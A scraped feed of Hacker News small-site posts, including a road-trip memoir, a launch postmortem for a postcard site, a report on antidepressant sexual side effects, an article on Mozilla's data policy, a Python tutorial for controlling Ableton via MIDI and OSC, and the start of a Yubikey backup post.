    These drives occurred over the course of ten years: some little more than a few days apart, others occupying wholly different segments of my life - their order and relation attested only in the fragile record of my phone's photo reel. I was morbidly aware of the risks of this approach - so aware that I spent many of my dreams fumbling with shifting camera apps, terrified of missing a photo of some brief roadside vision. And yet when the phone finally succumbed to light rain on Christmas morning, after surviving theft on the Piccadilly Line and half a dozen falls into the ocean, and all 35,000 photos were totally, irrevocably gone, I felt less distraught than unburdened.

    I was unaware that Luxi, in a typically brazen act of competence, had taken the phone some years before and quietly turned on automatic backups. The whole pile now sits in quiet disarray on a Google server, shuffled and duplicated and then shuffled again by a failed cloud migration and my clumsy efforts to impose order: present, mercilessly safe, but a mess beyond redemption.

    It's been two years and I've rarely had the stomach to look at them. When I do, I find road trips dismembered and rearranged: sequences of blurry landscapes taken through the windows of different sedans. You develop tricks to place them. Tree species, the color and width of the lane markings, snatches of language on distant signs all become important. The timestamps in the metadata are distorted by blatant lies - picturing me in 1995, the year of my birth, already towering and haggard beside a Suburban in completely anonymous desert. There are dozens of claustrophobic midnight scenes, back-seat nests in rest stops that will remain forever unnamed. In their haphazard way the pictures reflect that period more accurately than anything I could write here. In memory the drives have nearly fused, less separate events than a parallel mode I sometimes entered.

    I’ve felt devoted to these photos for years like some doomed curator, but I don’t think I ever liked them. Photography doesn’t really interest me. Each one is a committed lie: a promise that someday I'd do something to commemorate that first sensation. Let me show you a few first, without commentary.

    At some point, each one seemed instrumental to a piece of writing that would resolve everything. But by then I was already living too quickly for that to have happened. I was moving between installments of what Luxi took to calling the "death drive", capturing an insidious logic that emerges a few hours into the road trance when the white heat of movement takes hold and you find yourself calculating the farthest point you can reach in the brief tenure of the rental car. There is a perverse necessity to traverse as much of a country as possible, missing every Lonely Planet highlight, and seeing only one distant thing with incredible brief clarity. Ten minutes in Bar Harbor in a blizzard. A few hours at the visitor center of the Shiretoko Peninsula. Pitiless nights huddled under sodden driftwood on the southern coast of Sweden. I would find these places - first by chance, and then again and again in the years that followed, returning obsessively whenever I could - rarely seeing anything new in a country, drawn only to taste again of some sensation so specific that I had craved it for years.

    I would be on the fell southern banks of the Danube one night, looking back at Bratislava as Ortiz read aloud and swirled the trash among the root-bound shallows with his boot - and on top of a ridge in the White Mountains the next, tending an oily fire of the Park Service's rarest and most precious pine needles as Pusic burned too with his own sheer Protestant exuberance. My passengers would model completely opposed understandings of what we were up to - but the proximity of the encounters made for absurd lapses. Driving beside them at night, I would sometimes look over and find that I had gotten them confused.

    You recall other details with an absolute, useless clarity. How a homeless woman standing on the shoulder of the I-95 outside of Bridgeport, Connecticut stared across 30 feet of grey air into the windows of an empty glass factory in a state of full-body rapture. Or how it feels to fall from the trance of the Peak District straight into Sheffield on Ecclesall Road: skidding down a chute of homes that flash from mock Tudor to pebbledash like pictures in a zoetrope. There were whole afternoons when towns in the Midlands seemed the answer, or one answer, already fragile, a potential route forward occluded by a thick pane of glass. The briefest glimpse of an ideal valley has you exiting the freeway only to find slumping rows of brick barracks and cottage-cheese stucco, all of it hanging like a miasmic gel over the hills that formed the locus of your intense longing. These discoveries drove me to constant frustrated movement, an aimless grappling with the finite number of ways you can relate to a certain view, the limited roles available to you in a foreign country's villages.

    When I did stop (and stopping isn't easy at this pace: you realize that the brakes fell off a hundred yards back, that spiritual momentum is as real as physical) there seemed to be some unified theory hovering above it all, some pattern or cipher that would make apparent the role that this series of revelations would play in my life.

    So I would return to the few cities where I was missed and try to make a version of myself legible. When asked how I'd spent the last five years, I realized that I had at once far too much and far too little to say. It helped that outwardly similar lifestyles had become popular while I was gone. Among the people I'd met in college, I could think of a dozen pursuing similar itineraries - but keyed to the numerical outcomes of philanthropy or the scale of SaaS start-ups built in Moroccan coffee shops. The whole thing made coherent by a commitment to some verbose and monolithic value structure. When I stayed with these people's parents - leaning around pyramids of organic produce to make eye contact in dazzlingly lit kitchens - they would reframe what I was doing in the terminology of their children's lives: all of the "optionality", none of the "impact". For my own parents, my passport alone was an object of wonder; looking at its stamps together was among the most uncomplicated joys that the travel offered.

    Then the logistical captors I'd almost forgotten I was fleeing would begin to close in, demanding the periods of frantic industry that kept the whole taped-together machine creaking forward: the rental cars booked and promises made, the scattered sham labor sent off. Already many others I knew were prematurely winding down, scheduling a half-day's recreation two months in advance. As much as anything, I was running from them. In some immature, anarchic way I was proud of this - proud that I was living at a pace that I knew most others couldn't, proud too that I had evaded nearly every external system, every form of constraint. All enabled by the perverse conditions of contemporary life: that all of this is cheaper than sitting still. If you know what you're doing, it's essentially free.

    And then sometimes a photo swims up from the pile and is entirely self sufficient. It pulls you straight back in.

    Wool socks dry on the dashboard. Above, framed in the vanishing arcs of the wiper blades, a series of images appear in miniature before being erased by snow: a weathervane shaped like a leaping horse, derelict bobcat diggers arranged in conspiratorial semicircles, a gazebo slumped in a century's slow fall. Pittsfield, Maine has one open business and it's Vittles, where siblings Rick and Irma skid around on feet as thin and elongated as canoes. Modeling essentially identical bodies, an inheritance in the truest sense, their thorax and rib cage are articulated back between their high sloping shoulders, suggesting a carapace concealed under his battered rain coat, her mottled fuchsia jumper. In one perfect gesture, Irma approaches our table, spins a chair around, and straddles it to take our order. When she removes her knit cap, a bob of obsidian hair falls and bounces up from her shoulders with the lively abstraction of a stop motion film. As our omelettes cook, Rick steps outside to clear the snow from the stoop and slides three feet backwards with each desperate destabilizing stab of the shovel. In their own way, skittering around under the crumbling vinyl ceilings, advancing a dialogue that has continued unbroken since their birth ("I was out first!" Irma whispers, wide-eyed), they are the most charismatic people I have met in years. They are minor nobility in exile from a country I have visited only once in a dream.

    That's one more clue; jot it down. The too-powerful metaphors of childhood given complete control: the detective's notepad, a side-quest's checklist superimposed over the world, the Aleph in Carlos Argentino Daneri's cellar. All of it simultaneous and coeternal, attenuating evenly out of meaning as the photos swell beyond any possible usefulness, defying the inferences they seem to make possible. There is constant reflection and yet none at all. None of it can possibly be instrumentalized. The mental catalogue simply growing, the map filling in. Any doubt beaten by the certainty that if only I returned once more to that stretch of agricultural highway where I first felt some atmospheric potential - then it would all come together.

    On December 18th, in the Sunken Gardens of the Santa Barbara Court House, beside a bush where I found a dead man as a child, I married the only person who has kept up; the only person who, on the announcement of a lockdown in London, looked at someone she'd known for two weeks and said something entirely at odds with her upbringing and national character: "Let's get out of here."

    We were in Istanbul within days, walking through a stunned and silent city as we realized, the first of many times over the next four years, the extremity of what we had agreed to. We rented a few cars each month, never signed a lease, never compromised; we constantly looked back.

    I am no longer on shore leave. My daily tasks are flyering hilltop neighborhoods with promises of increasingly vague services, or trying to convince a 60 year old man that I can afford his spare bedroom. For the next few months at least there will only be memories, heavily romanticized - ways of looking back at a previous life that already feels like it's drifting slowly away.

    Last week I took the ferry to Vallejo and bought an '02 Camry from a man by the docks. It's mithril blue with black leather, an early GPS that shows highways a single pixel wide slashing out across a black expanse. There are some new roads out there that my dad told me about: stretches along the river delta that go completely dark at night. I think I’m going to delete the photos.

    ]]>
    https://www.onshoreleave.com/posts/death-drives/ hacker-news-small-sites-43210414 Fri, 28 Feb 2025 20:45:08 GMT
    <![CDATA[How Not to Launch on Hacker News]]> thread link) | @threekindwords
    February 28, 2025 | https://threekindwords.com/blog/how-not-to-launch-on-hackernews/ | archive.org

    One of my blog posts was picked up on Hacker News, and overnight my humble postcard vending machine on the internet got a whole lot more traffic than I expected. And just when everything was set to take off, the machine got jammed, right at my big moment. Here’s a post-mortem of what went down and how I fixed it while still managing to be there for my kid’s birthday.

    Preparing for Launch

    My goals for this past sprint were simple: I set out to launch the blog, hook up analytics, and start a newsletter. I had heard that the secret to SEO was to make great content. So, I spent the first week hammering out three solid posts. The first two detailed the backstory of how I came up with and built the project, while the third was a thinkpiece that reimagined Three Kind Words as a vending machine on the internet.

    Next, I needed a way to see if my content was actually reaching people. I did not want an analytics tool that tracked every mouse movement or forced cookie banners on visitors. Instead, I was looking for something that respects privacy and still provides useful metrics. That is when I discovered goatcounter.com. It was lightweight and showed the metrics that mattered to me: page views, referrers, and details like browser size and operating system. It turned out to be exactly what I needed, and best of all, it was free to get started.
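
    For anyone curious, wiring it up is a single script tag, roughly like this (with MYSITE standing in for your own GoatCounter code):

      <script data-goatcounter="https://MYSITE.goatcounter.com/count"
              async src="//gc.zgo.at/count.js"></script>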

    “It works on my machine”

    I published the blogs and sent the links to a few of my friends. Everything still looked and worked perfectly on my end, and I felt confident that we were ready to launch. That is, until a friend reported that the site looked completely broken. A screenshot they shared showed that the words and styles lists were not loading. I couldn’t replicate it.

    WHY????

    Strangely, when they switched to Safari’s private mode, the site started working and they placed an order. However, the PDF preview turned out all kinds of wrong. The background color that my friend had chosen was missing. I had not changed that part in ages, so it was obvious that something was amiss. I contacted PostGrid support, but since it was Friday afternoon, I did not expect to hear back anytime soon.

    The background is supposed to be yellow…

    I had spent months building this thing and it was finally ready to launch, but now it was broken and I had no idea why. Looking at a flat line in my analytics, I felt like I was fighting an uphill battle just to catch anyone’s attention. Exhausted and frustrated, I went to bed wondering why everything worked perfectly for me but failed for my friend. And what’s up with the PDF previews?

    My Ill-Fated Hacker News Moment

    I had no idea that as I slept, my “vending machine on the internet” post would light up on Hacker News and climb to the front page. I woke up to a flurry of unexpected newsletter signups and, believe it or not, random people on the internet giving me money. Checking goatcounter, I saw that the post had already generated about 12,000 page views.

    When I clicked on the Hacker News link, I instantly recognized that the issue my friend had pointed out was now affecting a lot more people. It was like watching a train wreck in slow motion.

    Doh

    Not to mention that it was my oldest child’s birthday party that day. In those few precious minutes between party prep and cake time, I skimmed through the comments and logs. More users were reporting that parts of the site were broken. I tried to fix some stuff in a hurry, but didn’t have time to figure out the root cause.

    I made the decision to stop obsessing over the site and be there for my daughter’s birthday. There were cinnamon rolls, a massive cheesecake, and core memories being made. I chose to be present, and I have no regrets.

    Taming the Chaos

    After the party ended and the house finally quieted down, I poured myself a cup of tea and dug into it. Turns out those SEO changes I made had accidentally removed a critical data template from the Hugo configuration. This template was responsible for pulling the available set of words from my backend.

    This is what broke everything

    I suspect that either Cloudflare was serving an older version of the site or that some browsers (Firefox, for example) could not find the essential words.json file. Without this file, the rest of the JavaScript would break and leave users with an unusable interface.

    Once I identified the issue, I dove into the code, restored the missing template, and pushed the changes. I then cleared the cache in Cloudflare, hoping to resolve the problem. It worked. Orders started coming in again, and I began to breathe a little easier.

    Then came another problem: the PDF previews were missing their background color. They had worked perfectly before, but suddenly the CSS wasn’t being applied. Even hardcoding the style did nothing. I reached out to an LLM for help. It confidently explained that HTML-to-PDF rendering can be extremely finicky and suggested I switch from standard HTML/CSS to SVGs for both the background and text layout. Somehow it worked. PostGrid soon began rendering the PDFs correctly, and I regenerated all the postcards in the queue.

    Ahh, much better!

    Lessons Learned

    I should not be manually testing the site after every change. I should have a CI/CD pipeline that tests the site prior to deployment. For that to work, I need to write some tests. With a little help from an LLM, I got a suite of Playwright tests up and running in no time. Next, I can get these tests running in a GitHub Actions workflow, so it tests the site before it is deployed.
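
    A minimal test in that suite looks something like this ("#words" is a placeholder selector, not the site's actual markup):

      import { test, expect } from '@playwright/test';

      test('words list loads', async ({ page }) => {
        await page.goto('http://localhost:1313/'); // default hugo server address
        // the words list is what silently broke in production
        await expect(page.locator('#words')).not.toBeEmpty();
      });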

    Also, I need to ensure that when I am testing locally, I am not using a cached version. From now on, I will use this command to run my hugo server:

    hugo server --disableFastRender --gc --ignoreCache

    Using all of these switches will ensure that I am always working with the latest version of the site. It is a bit overkill, but it is better to be safe than sorry! Together with a suite of automated tests, I can have a much more reliable system and hopefully fewer embarrassing deployments.

    PROTIP: checkout Playwright’s built-in UI: npx playwright test --ui

    Reflections

    With the launch chaos finally behind me, I took a moment to step back. I went out onto the front porch, watched the wind ruffle the treetops, and listened to the calm that a winter evening can bring. In that quiet moment, I reflected on everything that had happened.

    I felt a mix of regret, pride, and hope. I regret that things were far from perfect during my big moment on Hacker News. I am proud that I wrote a compelling blog post and shipped a product that people seem to like. I am hopeful that even though the site was down for a while, I still managed to take in nearly 50 orders, which equates to about 150 kind words. This boost alone will bring me past the halfway point of my goal of 300 kind words in 2025. Maybe I should revise that goal?

    I have also been encouraged by the feedback I received. One person told me, “I am a corporate software engineer and the things I build rarely affect normal people. Seeing your project, which can bring joy to everyday lives, is incredibly inspiring.” Another developer commented, “As a software dev myself, the idea of a passive income site is intriguing. The concept of a vending machine resonates with people like me.” I think I am onto something with the mental model of a vending machine as a creative catalyst for makerpreneurs. I am encouraged to keep writing about it and see where it goes.

    Altogether, this experience taught me about resilience, the importance of owning my mistakes, and the value of staying true to my vision even when the internet is screaming in my face. It is not solely about making money or chasing trends; it is about creating something that reflects who I am, with all my imperfections.

    Keep on shining, and as always, stay kind.

    ]]>
    https://threekindwords.com/blog/how-not-to-launch-on-hackernews/ hacker-news-small-sites-43210382 Fri, 28 Feb 2025 20:43:26 GMT
    <![CDATA[A quick ramp-up on ramping up quickly in SpiderMonkey]]> thread link) | @jamii
    February 28, 2025 | https://www.hytradboi.com/2025/0a4d08fd-149e-4174-a752-20e9c4d965c5-a-quick-ramp-up-on-ramping-up-quickly | archive.org

    Unable to extract article]]>
    https://www.hytradboi.com/2025/0a4d08fd-149e-4174-a752-20e9c4d965c5-a-quick-ramp-up-on-ramping-up-quickly hacker-news-small-sites-43210218 Fri, 28 Feb 2025 20:35:06 GMT
    <![CDATA[Programming Without Pointers]]> thread link) | @jamii
    February 28, 2025 | https://www.hytradboi.com/2025/05c72e39-c07e-41bc-ac40-85e8308f2917-programming-without-pointers | archive.org

    Unable to extract article]]>
    https://www.hytradboi.com/2025/05c72e39-c07e-41bc-ac40-85e8308f2917-programming-without-pointers hacker-news-small-sites-43209718 Fri, 28 Feb 2025 20:04:04 GMT
    <![CDATA[delete]]> thread link) | @johnnybzane
    February 28, 2025 | https://medtour.help/primenenie-antidepressantov-svyazano-so-stojkoj-poterej-chuvstvitelnosti-genitalij/ | archive.org

    Antidepressant use is associated with sexual side effects, and is often accompanied by decreased genital sensitivity that persists even after the medication is discontinued, according to a new study from Simon Fraser University.

    The study, published in the journal Social Psychiatry and Psychiatric Epidemiology, shows that 13 percent of people taking antidepressants reported decreased genital sensitivity, compared with one percent of people taking other psychiatric medicines.

    This problem has long been overlooked, largely because of stigma, shame, and embarrassment among patients. For some, the problem went away with time, but for many it persists long-term.

    Sexual dysfunction after taking antidepressants such as SSRIs is an understudied and underreported syndrome in which sexual function does not recover even after the drug is discontinued.

    “I’ve had to talk to teens who have had this experience, and it’s horrible. There’s no way to describe how severe this trauma is for people. It’s not just about ‘numb’ genitalia – it’s about what it can mean for a relationship when you become impotent/frigid without your consent. This is serious harm,” says principal investigator Travis Salway.

In some people, this side effect manifests in a mild form: the genitalia become less sensitive, maybe 80 percent of what they used to be. In more severe cases, there is complete numbness.

    The study was part of a large survey (~9,600 mostly LGBTQ youth in Canada and the US) that focused on mental health, conversion therapy, and other factors that shape experiences related to gender and sexuality in adolescence and early adulthood.

    “This study reminds us that pharmacological interventions play a role in shaping young people’s sexual experiences, and there is a critical need for better understanding and education in this regard,” said Travis Salway, SFU associate professor of health sciences and principal investigator of the study.

    As part of the questionnaire, participants were asked if they had ever taken antidepressants, discontinued them and subsequently experienced a range of symptoms characteristic of antidepressant-induced sexual dysfunction (AISD). Research on AISD is complicated by the fact that many symptoms, such as low libido, can also be attributed to depression. However, genital numbness, known as genital hypoesthesia, is a symptom of AISD that is not associated with depression.

“There is no medical explanation for why people should experience genital numbness due to depression or anxiety (or other common conditions for which SSRIs/SNRIs are prescribed),” Salway explains. “The frequency of genital hypoesthesia in those with a history of antidepressant use was more than 10 times the frequency we observed in those taking other psychotropic medications (e.g., antipsychotics or sedatives).”

    Part of the problem is the lack of informed consent and accountability. Although antidepressants are often prescribed to people suffering from anxiety, obsessive-compulsive disorder, post-traumatic stress disorder, panic disorder, phobias, chronic pain, depression and other conditions, people are not warned about the risks.

    The findings emphasize the need for better education of patients and prescribing physicians, as well as warnings, so that patients can decide for themselves whether such risks are worth taking.


    ]]>
    https://medtour.help/primenenie-antidepressantov-svyazano-so-stojkoj-poterej-chuvstvitelnosti-genitalij/ hacker-news-small-sites-43209652 Fri, 28 Feb 2025 19:58:24 GMT
    <![CDATA[Removed – Mozilla doesn't sell data about you, and we don't buy data about you]]> thread link) | @guptadeepak
    February 28, 2025 | https://guptadeepak.com/mozillas-data-practices-and-privacy-evolution-recent-developments/ | archive.org

    Mozilla's Stance on User Data

Mozilla has long built its reputation on privacy, positioning Firefox as an alternative to data-hungry tech giants. For years, Firefox's messaging included explicit assurances that "Mozilla doesn't sell data about you, and we don't buy data about you." However, yesterday (Feb 27, 2025) Mozilla updated its Data Privacy FAQ with more nuanced language, now stating: "Mozilla doesn't sell data about you (in the way that most people think about 'selling data'), and we don't buy data about you."

    Feb 06, 2025 - Snapshot of Mozilla Data Policy

    This rewording acknowledges that while Mozilla shares some data with partners for Firefox's "commercial viability," such data is stripped of identifying information, shared in aggregate, or protected via privacy-preserving techniques. The change was prompted by increasingly broad legal definitions of "data sales" in certain jurisdictions, making Mozilla cautious about making absolute promises.

    Feb 28, 2025 - Snapshot of Mozilla Data Policy

    Mozilla maintains that its business model doesn't depend on selling personal data. The organization's primary revenue (over 90%) comes from search engine partnerships, particularly its agreement with Google to serve as Firefox's default search engine.

    New Terms of Use and Privacy Policy Changes

On 27 February 2025, Mozilla introduced official Terms of Use for Firefox for the first time, along with an updated Privacy Notice. Previously, Firefox operated under an open-source license with informal privacy commitments. Mozilla explained this change as necessary to make its commitments "abundantly clear and accessible" in today's complex tech landscape.

    The rollout sparked controversy among users when they noticed the removal of the explicit promise "Unlike other companies, we don't sell access to your data" from Mozilla's website and materials. This omission led to speculation that Mozilla might be preparing to sell user data, despite the organization's denials.

    Another controversial point emerged from a clause in the new Terms of Use about user-submitted information. The terms asked users to "grant Mozilla a nonexclusive, royalty-free, worldwide license" to use information entered into Firefox. Taken at face value, this sounded as if Mozilla claimed rights over everything users type into the browser. Mozilla quickly clarified that this license only exists to make Firefox's basic functionality possible (processing URLs, performing searches, etc.) and that all data usage remains governed by the Privacy Notice's protections.

    Many of these changes came to light before Mozilla's official announcements, thanks to its open development process. GitHub users spotted the changes in Mozilla's repositories, particularly the deletion of the line about not selling user data from the Firefox FAQ page.

    Developers on GitHub expressed concern, with commenters urging that "the rationale for this ToS change is discussed in public," noting it seemed counter to Mozilla's principles of transparency and privacy.

    On social media and forums, reactions ranged from disappointment to outrage. Some users accused Mozilla of betraying its privacy ethos, while others expressed skepticism about Mozilla's semantics—arguing there was little difference between "selling data" and "sharing it with partners" who provide revenue. Many long-time Firefox users discussed switching to alternative browsers like LibreWolf, Brave, or Safari.

    Mozilla responded by publishing explanatory blog posts and engaging in forum discussions, but the initial lack of upfront communication allowed rumors to proliferate.

    Privacy Incidents: Telemetry and Advertising Attribution

    Beyond the Terms of Use controversy, Mozilla has faced other privacy-related challenges. In mid-2024, Mozilla implemented Privacy Preserving Attribution (PPA)—a system to help advertisers measure ad effectiveness without exposing individual user identities. However, it was enabled by default in Firefox 128, sending limited data about whether ads led to Firefox installations or website visits without explicit user opt-in.

    This caught the attention of European privacy advocates. In September 2024, the Austrian digital rights group noyb filed a formal GDPR complaint, alleging that Mozilla had introduced tracking without users' consent. Mozilla defended PPA as privacy-preserving and less invasive than typical ad trackers, but admitted it "should have done more" to inform users and gather feedback.

    A related issue involved Mozilla's use of Adjust, a third-party telemetry tool in mobile Firefox versions. In 2024, it came to light that Firefox for Android and iOS were sending data to Adjust to track how Mozilla's ads led to app installs, without prominent disclosure. Following community backlash, Mozilla removed the Adjust SDK from its mobile apps by August 2024.

    Mozilla acknowledged regretting enabling such telemetry by default but explained the pressure it faced from advertisers who demand feedback on their campaigns. The compromise was to implement privacy-focused solutions and use aggregated metrics, though not everyone was convinced this was sufficiently transparent.

    Product Updates Emphasizing Privacy

    Despite these controversies, Mozilla continues to ship product updates aimed at enhancing user privacy. In Firefox version 135 (December 2024), Mozilla retired the old "Do Not Track" (DNT) setting in favor of the more robust Global Privacy Control (GPC) signal. Unlike DNT, which was widely ignored by websites, GPC has legal backing in regions like California, making it a more enforceable choice for users wanting to opt out of data collection.

    Mozilla has also strengthened technological protections against tracking. In June 2022, Firefox rolled out Total Cookie Protection by default to all users, a milestone in browser privacy. This feature isolates cookies to the site where they were created, essentially giving each website its own "cookie jar" and preventing trackers from using third-party cookies to follow users across the web.

    Additionally, Firefox's Enhanced Tracking Protection continues to block known trackers, fingerprinters, and cryptominers by default. Firefox's private browsing mode goes even further, blocking social media trackers and providing complete cookie isolation.

    As Google Chrome moves to Manifest V3 (which limits the capabilities of ad-blockers), Mozilla has announced it will continue supporting the older Manifest V2 for Firefox add-ons alongside Manifest V3. This ensures users can keep using robust ad-blockers and privacy extensions without disruption, demonstrating Mozilla's willingness to diverge from Chrome in defense of user choice.

    Organizational Decisions and Notable Developments

    One significant controversy involved Mozilla's partnership with OneRep for its "Mozilla Monitor Plus" service, which helps users remove personal information from data broker websites. In March 2024, an investigative report revealed that OneRep's founder and CEO also owned numerous people-search and data broker sites—the very kind of privacy-invasive services OneRep claimed to protect users from.

    Mozilla quickly announced it would terminate the partnership, stating that "the outside financial interests and activities of OneRep's CEO do not align with our values." However, as of early 2025, Mozilla was still in the process of disentangling from OneRep, explaining that finding a replacement service was taking longer than anticipated.

    Beyond specific controversies, Mozilla has been diversifying its product portfolio to reduce reliance on the Firefox-Google search deal for revenue. New initiatives include Mozilla VPN and Mozilla.ai, a startup focused on ethical AI. The organization has also made difficult financial decisions, including layoffs in recent years, to maintain stability while continuing to advocate for an open, privacy-respecting web.

    Conclusion and Implications

    Claims that "Mozilla is selling user data" are not supported by evidence—Mozilla's policies emphasize that any data sharing happens in a privacy-conscious way. However, by removing its absolute "we never sell data" pledge and adding legal language about data licenses, Mozilla inadvertently created doubt among its loyal users.

    The community reactions demonstrate that Mozilla's user base holds it to a higher standard than other browser makers. Every move that hints at dilution of privacy or transparency faces immediate scrutiny. This pressure keeps Mozilla aligned with its founding principles, as evidenced by its quick responses to clarify policies or reverse course on contentious features.

    For users, two points are clear: Firefox remains one of the most privacy-friendly mainstream browsers, with features like Total Cookie Protection, tracker blocking, and powerful extension support. Unlike many tech companies, Mozilla does not monetize by profiling users or selling targeted ads based on browsing history. However, users must stay vigilant to ensure Mozilla maintains its privacy commitments.

    From an industry perspective, Mozilla's handling of these issues could influence broader norms. When Firefox pushes privacy features like cookie isolation or GPC signals, it pressures competitors to offer similar protections. Mozilla is essentially testing whether a major software product can sustain itself without compromising user trust.

    In summary, Mozilla is navigating complex legal, financial, and perceptual challenges regarding user data while striving to uphold its core ethos: "Internet for people, not profit." As long as Mozilla continues to engage with its community and prioritize privacy in tangible ways, Firefox will likely retain its position as the browser of choice for privacy-conscious users, and its developments will continue to influence the broader fight for online privacy.

    ]]>
    https://guptadeepak.com/mozillas-data-practices-and-privacy-evolution-recent-developments/ hacker-news-small-sites-43209622 Fri, 28 Feb 2025 19:55:34 GMT
    <![CDATA[Controlling Ableton with Python]]> thread link) | @phantomshelby
    February 28, 2025 | https://sangarshanan.com/2025/02/25/connecting-python-with-ableton/ | archive.org

    Okay, so if you’ve ever seen me rocking a T-shirt, there’s like a 90% chance I snagged it at a Pycon. So yeah, I’m kinda obsessed with using Python for everything lol. I’ve been messing around with Ableton lately, trying to add “DAW guru” to my list of skills. And the first thing I wondered was: Can I control this thing with Python?

    Turns out, there are two ways to do this. The first (and easiest) is sending MIDI signals to Ableton. The second, which takes a bit more setup, is actually talking to Ableton directly – querying and controlling the interface. This is where OSC comes in, and Live has an API for it.

    Let’s dive into sending MIDI first!

    Sending MIDI data to Ableton Live

To get Python and Ableton chatting, we’ll use “Inter-Application Communication” (IAC). It’s basically a virtual MIDI cable that lets applications on the same computer exchange MIDI data.

    Here’s the lowdown on setting it up (if you’re on a Mac like me):

    1. Open Audio MIDI Setup: It’s hiding in /Applications/Utilities.
    2. Show MIDI Studio: Go to Window -> Show MIDI Studio.
    3. Enable IAC Driver:
      • Double-click the IAC Driver icon (it’ll probably be grayed out).
      • Tick the “Device is Online” box.
      • Add a few MIDI Ports by hitting the + button. Think of these as virtual MIDI cables.
      • Apply the changes.
    4. Configure Ableton Live:
      • In Ableton, find the MIDI track you want to boss around.
      • Change the “MIDI From” setting from “All Ins” to “IAC Driver (Bus 1)” (or whichever bus you made).
      • Assign different channels for different MIDI tracks/instruments if you want to control multiple instruments.

    Boom! Ableton’s now ready to listen to Python’s MIDI commands.

    We’ll use the rtmidi library to fling MIDI messages from Python and python-osc to get data back from Ableton.

    Here’s a taste of sending MIDI notes to Ableton:

    import time
    import rtmidi
    
    midi_out = rtmidi.MidiOut() # Create a MIDI output object
    midi_out.open_port(0) # Open the first available MIDI port
    
def send_notes(pitch=60, repeat=1, sleep_time=0.5):
    """Plays a MIDI note `repeat` times, holding each for `sleep_time` seconds."""
    for _ in range(repeat):
        note_on = [0x90, pitch, 112] # status byte 0x90 = note-on (channel 1), velocity 112
        note_off = [0x80, pitch, 0] # status byte 0x80 = note-off (channel 1)
        midi_out.send_message(note_on) # Start the note
        time.sleep(sleep_time) # Hold for the specified duration
        midi_out.send_message(note_off) # Release the note
    
    # Send MIDI i.e Play notes
    send_notes(60, 3, 0.75)
    send_notes(62, 1, 0.5)
    send_notes(68, 4, 0.25)
    send_notes(58, 2, 0.5)
    

    Go forth and make some noise!

    Generative Melodies with Markov Chains

    Now that we can fire off MIDI notes, how about creating melodies using Markov chains? A Markov chain is a fancy name for a model that predicts the next note based on the current one.

    You can find an example in the ableton-connect repository. The code cooks up a Markov chain from a bunch of training notes and then uses it to whip up a sequence.

    Here’s the gist of it:

    1. Define a Markov Chain: The code makes a dictionary that is the Markov chain. The keys are the current notes, and the values are lists of notes that could come next.
    2. Generate a Sequence: Starting with a note, the code picks the next note randomly from the list of possible notes in the Markov chain. Repeat, and you’ve got a sequence!
    3. Send MIDI Notes: The generated notes get beamed to Ableton Live using that send_notes function we made earlier.

    Tweak the training data and Markov chain settings, and you can churn out all sorts of melodies.
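To make that concrete, here is a minimal sketch of the approach (the transition table and note values are illustrative, not taken from the repository; send_notes is the helper defined earlier):

import random

# Markov chain: current MIDI note -> candidate next notes
transitions = {
    60: [62, 64, 67],
    62: [60, 64],
    64: [62, 67],
    67: [60, 64, 72],
    72: [67],
}

def generate_melody(start=60, length=8):
    """Walk the chain, picking each next note at random."""
    note, melody = start, [start]
    for _ in range(length - 1):
        note = random.choice(transitions.get(note, [start]))
        melody.append(note)
    return melody

for pitch in generate_melody():
    send_notes(pitch, repeat=1, sleep_time=0.25)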

    OSC Interface with Ableton Live

To send OSC to Ableton, you’ll need to install and enable a third-party remote script (details here: https://help.ableton.com/hc/en-us/articles/209072009-Installing-third-party-remote-scripts). An absolute legend has already built a remote script called AbletonOSC that provides an Open Sound Control (OSC) interface to control Ableton Live. Once you’ve installed it, select “AbletonOSC” under the Control Surface dropdown in Preferences > Link / Tempo / MIDI.

    AbletonOSC listens for OSC messages on port 11000 and sends replies on port 11001. Replies go back to the same IP address that sent the message. When you’re asking for properties, you can use OSC wildcard patterns. For example, /live/clip/get/* 0 0 will grab all the properties of track 0, clip 0.
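Since replies arrive on port 11001, you can also listen for them from Python. Here is a minimal sketch of my own (not from AbletonOSC’s docs) using python-osc’s server utilities; it sends the wildcard query above and prints a single reply:

from pythonosc.dispatcher import Dispatcher
from pythonosc.osc_server import BlockingOSCUDPServer
from pythonosc.udp_client import SimpleUDPClient

client = SimpleUDPClient("127.0.0.1", 11000)

def on_reply(address, *args):
    # AbletonOSC replies on the same address that was queried
    print(address, args)

dispatcher = Dispatcher()
dispatcher.set_default_handler(on_reply)

# Ask for all properties of track 0, clip 0
client.send_message("/live/clip/get/*", (0, 0))

# Block until one reply datagram arrives, handle it, then return
server = BlockingOSCUDPServer(("127.0.0.1", 11001), dispatcher)
server.handle_request()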

Now you can send OSC commands to boss Ableton around! This basic script sets the tempo, makes a clip, adds notes, and fires it up. The commented-out part stops all the playing clips.

    from pythonosc.udp_client import SimpleUDPClient
    
    ip = "127.0.0.1"
    to_ableton = 11000
    from_ableton = 11001
    client = SimpleUDPClient(ip, to_ableton)
    
    # Set tempo
    client.send_message("/live/song/set/tempo", [140])
    
    # Create clip
    client.send_message("/live/clip_slot/create_clip", (0, 0, 4))
    
    # Send notes
    client.send_message("/live/clip/add/notes", (0, 0,
                                                    60, 0.0, 0.25, 64, False,
                                                    67, -0.25, 0.5, 32, False))
    client.send_message("/live/clip/add/notes", (0, 0,
                                                    72, 0.0, 0.25, 64, False,
                                                    60, 3.0, 0.5, 32, False))
    
    # Fire up the clip
    client.send_message("/live/clip/fire", (0, 0))
    
    # # Stop the clips
    # client.send_message("/live/song/stop_all_clips", None)
    

    With these MIDI and OSC scripts, I’ve been able to set up tracks in Live that are fully controlled with code and can be tweaked on the fly by sending OSC signals.



    ]]>
    https://sangarshanan.com/2025/02/25/connecting-python-with-ableton/ hacker-news-small-sites-43209412 Fri, 28 Feb 2025 19:35:30 GMT
    <![CDATA[Virtual museum of socialist era graphic design in Bulgaria]]> thread link) | @NaOH
    February 28, 2025 | http://socmus.com/en/ | archive.org

    Unable to extract article]]>
    http://socmus.com/en/ hacker-news-small-sites-43209046 Fri, 28 Feb 2025 18:58:13 GMT
    <![CDATA[Backup Yubikey Strategy]]> thread link) | @ericdiao
    February 28, 2025 | https://fy.blackhats.net.au/blog/2025-02-28-backup-yubikey-strategy/ | archive.org

    After a local security meetup where I presented about Webauthn, I had a really interesting chat with a member about a possible Yubikey management strategy.

Normally when you purchase a yubikey it's recommended that you buy two of them - one primary and one backup. But how do you keep them in sync? You have to ensure every credential you enroll on the primary is also enrolled on the backup!

    This means you tend to have your secondary key nearby - not so great for backups/disaster management.

